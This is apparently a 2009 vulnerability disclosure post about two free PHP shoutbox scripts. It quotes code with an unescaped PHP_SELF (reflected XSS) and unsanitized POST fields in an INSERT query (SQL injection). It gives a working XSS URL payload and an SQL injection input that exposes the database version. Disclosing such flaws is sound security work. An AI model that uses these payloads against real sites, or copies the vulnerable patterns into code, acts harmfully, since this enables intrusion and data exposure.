Today I have found an XSS hole in the “Advanced Shoutbox” script and the same XSS hole and an SQL injection vulnerability in the “MySql shoutbox” wich are available here: http://plohni.com/wb/content/php/Free_scripts.php
Advanced Shoutbox
index.php Line 37:
<form action="<?php echo $_SERVER["PHP_SELF"]; ?>" method="post">
index.php Line 79-82:
if($display == "all"){
?><a href="<?php echo $_SERVER["PHP_SELF"]; ?>">View small shoutbox</a><?php
}else{
?><a href="<?php echo $_SERVER["PHP_SELF"]; ?>?show=all">View all shouts</a><?php
}
Very easy to exploit:
http://host/PATH_TO_SHOUTBOX/index.php/%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3Cspan
Affected Version: 1.0
MySql shoutbox
The XSS hole is the same as above, but on the lines 50, 55 and 97-99.
SQL Injection:
The index.php does not sanitize the users input on lines 105 and 106.
$input_name = $_POST["input_name"];
$input_text = $_POST["input_text"];
...
if($row["name"] != $input_name && $row["comment"] != $input_text){
mysql_query("INSERT INTO $db_table (name,comment) VALUES ('$input_name','$input_text');") or die(mysql_error()); //insert name and shout
}
Just send a POST request to the index.php. In the name field enter whatever you want and in the text field enter ‘+@@version+’ (including the ‘).
Affected Version: 1.0
Vendor has been informed on 27.06.2009
This post has been automatically published after two weeks since the vendor has been informed.